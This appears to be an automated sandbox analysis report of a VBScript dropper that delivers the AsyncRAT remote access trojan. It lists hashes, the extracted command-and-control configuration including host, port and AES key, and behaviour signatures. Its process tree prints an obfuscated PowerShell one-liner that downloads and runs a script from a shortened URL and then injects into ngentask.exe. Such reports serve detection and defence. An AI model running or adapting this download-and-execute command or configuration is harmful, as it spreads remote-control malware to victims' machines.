Analysis
-
max time kernel
128s -
max time network
159s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
27-07-2021 15:25
Static task
static1
Behavioral task
behavioral1
Sample
LKGFCV.vbs.vbs
Resource
win7v20210408
General
-
Target
LKGFCV.vbs.vbs
-
Size
730B
-
MD5
8a7246cc77596aa840c15b3ac9907c4e
-
SHA1
c34f30b5aa3777cf3b3d35cfd8af330f8af97981
-
SHA256
c7be7d6e94c31e0f376d1cb9be3e0f311d57ae1a318437dc7c28b2574a73be31
-
SHA512
790e62a08b098dcdda4dfc1cc218712f069426b639420aca7ae6dfbd239f765fe379b92847d12da8a8f68699068d1779e7415d1c76fa64a989ae9dfa8b7dbe94
Malware Config
Extracted
asyncrat
0.5.7B
newfrost.ddns.net:6666
AsyncMutex_6SI8OkPnk
-
aes_key
iQqiAD9kmzPLel2oEjZjj8tYKfnH5XkL
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
new
-
host
newfrost.ddns.net
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6666
-
version
0.5.7B
Signatures
-
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
-
Async RAT payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2084-358-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral2/memory/2084-359-0x000000000040C73E-mapping.dmp asyncrat behavioral2/memory/2084-382-0x0000000000D00000-0x0000000000D20000-memory.dmp asyncrat -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 9 1696 powershell.exe 11 1696 powershell.exe 19 1696 powershell.exe 20 1696 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 412 set thread context of 2084 412 powershell.exe ngentask.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exepowershell.exepid process 1696 powershell.exe 1696 powershell.exe 1696 powershell.exe 412 powershell.exe 412 powershell.exe 412 powershell.exe 412 powershell.exe 412 powershell.exe 412 powershell.exe 412 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exengentask.exedescription pid process Token: SeDebugPrivilege 1696 powershell.exe Token: SeDebugPrivilege 412 powershell.exe Token: SeDebugPrivilege 2084 ngentask.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 2256 wrote to memory of 1696 2256 WScript.exe powershell.exe PID 2256 wrote to memory of 1696 2256 WScript.exe powershell.exe PID 1696 wrote to memory of 412 1696 powershell.exe powershell.exe PID 1696 wrote to memory of 412 1696 powershell.exe powershell.exe PID 412 wrote to memory of 1852 412 powershell.exe ngentask.exe PID 412 wrote to memory of 1852 412 powershell.exe ngentask.exe PID 412 wrote to memory of 1852 412 powershell.exe ngentask.exe PID 412 wrote to memory of 1396 412 powershell.exe ngentask.exe PID 412 wrote to memory of 1396 412 powershell.exe ngentask.exe PID 412 wrote to memory of 1396 412 powershell.exe ngentask.exe PID 412 wrote to memory of 2084 412 powershell.exe ngentask.exe PID 412 wrote to memory of 2084 412 powershell.exe ngentask.exe PID 412 wrote to memory of 2084 412 powershell.exe ngentask.exe PID 412 wrote to memory of 2084 412 powershell.exe ngentask.exe PID 412 wrote to memory of 2084 412 powershell.exe ngentask.exe PID 412 wrote to memory of 2084 412 powershell.exe ngentask.exe PID 412 wrote to memory of 2084 412 powershell.exe ngentask.exe PID 412 wrote to memory of 2084 412 powershell.exe ngentask.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LKGFCV.vbs.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3BMLFhm'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file C:\Users\Public\ToT.ps13⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\ToT.ps1MD5
1553ebbcd9e6ba4ac17862506e0869cd
SHA12202ca18a46e81c3d4f8e021b69c77b8368eb580
SHA256ed0135626c359fa8bab49ea7481e20b5062d1f613c65b039cf42ae27ead0437d
SHA5125913d4b247970046febf38e18c614528bb6f9552cef4a2b1b34ef70a6831c84c9a0409217b221b3bf4adc0e0eb7083914bbd9e9d65d0b59b0104604b1fdaa238
-
memory/412-369-0x0000024023EB6000-0x0000024023EB8000-memory.dmpFilesize
8KB
-
memory/412-310-0x0000000000000000-mapping.dmp
-
memory/412-334-0x000002403E4D0000-0x000002403E4D1000-memory.dmpFilesize
4KB
-
memory/412-348-0x0000024023EB3000-0x0000024023EB5000-memory.dmpFilesize
8KB
-
memory/412-347-0x0000024023EB0000-0x0000024023EB2000-memory.dmpFilesize
8KB
-
memory/412-353-0x000002403E490000-0x000002403E49E000-memory.dmpFilesize
56KB
-
memory/1696-120-0x0000024E29CA3000-0x0000024E29CA5000-memory.dmpFilesize
8KB
-
memory/1696-121-0x0000024E41E90000-0x0000024E41E91000-memory.dmpFilesize
4KB
-
memory/1696-126-0x0000024E42250000-0x0000024E42251000-memory.dmpFilesize
4KB
-
memory/1696-309-0x0000024E29CA6000-0x0000024E29CA8000-memory.dmpFilesize
8KB
-
memory/1696-119-0x0000024E29CA0000-0x0000024E29CA2000-memory.dmpFilesize
8KB
-
memory/1696-114-0x0000000000000000-mapping.dmp
-
memory/2084-381-0x0000000007100000-0x0000000007101000-memory.dmpFilesize
4KB
-
memory/2084-375-0x0000000006900000-0x0000000006979000-memory.dmpFilesize
484KB
-
memory/2084-374-0x0000000006980000-0x0000000006981000-memory.dmpFilesize
4KB
-
memory/2084-371-0x0000000005A20000-0x0000000005A21000-memory.dmpFilesize
4KB
-
memory/2084-372-0x0000000005FC0000-0x0000000005FC1000-memory.dmpFilesize
4KB
-
memory/2084-373-0x0000000005B30000-0x0000000005B31000-memory.dmpFilesize
4KB
-
memory/2084-370-0x0000000005140000-0x0000000005141000-memory.dmpFilesize
4KB
-
memory/2084-383-0x0000000006FA0000-0x0000000006FA1000-memory.dmpFilesize
4KB
-
memory/2084-376-0x0000000006A50000-0x0000000006A51000-memory.dmpFilesize
4KB
-
memory/2084-377-0x0000000006B50000-0x0000000006B51000-memory.dmpFilesize
4KB
-
memory/2084-378-0x0000000006AC0000-0x0000000006AC4000-memory.dmpFilesize
16KB
-
memory/2084-379-0x0000000006F10000-0x0000000006F9D000-memory.dmpFilesize
564KB
-
memory/2084-380-0x00000000070A0000-0x00000000070F9000-memory.dmpFilesize
356KB
-
memory/2084-358-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/2084-382-0x0000000000D00000-0x0000000000D20000-memory.dmpFilesize
128KB
-
memory/2084-359-0x000000000040C73E-mapping.dmp